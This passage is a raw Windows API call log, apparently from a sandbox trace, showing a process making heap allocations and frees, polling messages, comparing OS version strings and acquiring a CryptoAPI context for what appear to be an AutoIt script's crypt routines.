hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0201.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0201.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0201.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0201.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546e8 | out: hHeap=0x970000) returned 1 [0201.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0201.143] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0201.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0201.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0201.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0201.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0201.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0201.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0201.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0201.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0201.143] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0201.143] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0201.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0201.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0201.144] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0201.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0201.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0201.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0201.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0201.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0201.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0201.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0201.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0201.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0201.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0201.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0201.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0201.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0201.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546e8 | out: hHeap=0x970000) returned 1 [0201.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0201.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0201.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0201.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0201.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0201.145] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0201.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0201.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0201.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0201.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0201.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0201.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0201.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0201.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0201.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0201.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0201.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0201.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0201.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0201.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0201.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0201.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0201.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0201.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0201.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0201.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0201.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0201.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0201.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0201.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0201.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0201.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0201.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69928, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0201.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0201.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0201.146] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0201.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0201.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0201.146] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0201.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fff0 [0201.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0201.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0201.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0201.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69988 [0201.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69988, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0201.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0201.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0201.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0201.147] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0201.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0201.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0201.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fff0 | out: hHeap=0x970000) returned 1 [0201.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0201.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0201.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0201.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0201.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0201.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0201.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0201.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0201.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0201.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0201.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0201.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0201.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0201.148] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0201.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0201.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0201.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0201.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0201.150] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0201.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0201.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0201.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0201.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0201.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0201.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0201.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0201.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0201.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0201.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0201.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0201.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0201.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0201.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0201.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0201.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0201.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0201.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0201.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0201.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0201.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0201.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0201.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0201.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0201.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0201.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0201.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0201.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0201.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0201.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0201.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0201.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0201.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0201.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0201.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0201.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0201.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0201.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0201.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0201.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0201.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0201.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0201.153] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0201.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0201.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0201.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0201.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0201.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0201.153] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0201.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdf8 [0201.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0201.153] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0201.153] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0201.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0201.153] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0201.153] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0201.153] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0201.154] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0201.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fed8 [0201.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0201.154] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0201.154] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0201.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0201.154] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0201.154] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0201.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0201.154] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0201.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0201.154] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0201.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0201.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0201.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0201.155] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0201.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0201.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff80 [0201.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0201.156] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0201.156] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0201.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0201.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0201.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0201.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0201.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0201.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0201.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0201.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0201.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0201.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0201.156] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0201.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0201.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0201.156] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0201.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0201.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0201.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0201.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0201.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0201.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0201.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0201.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0201.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0201.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0201.157] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0201.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0201.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0201.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0201.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0201.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0201.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0201.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0201.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0201.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0201.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0201.157] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0201.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0201.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0201.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0201.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0201.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0201.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0201.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0201.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0201.158] 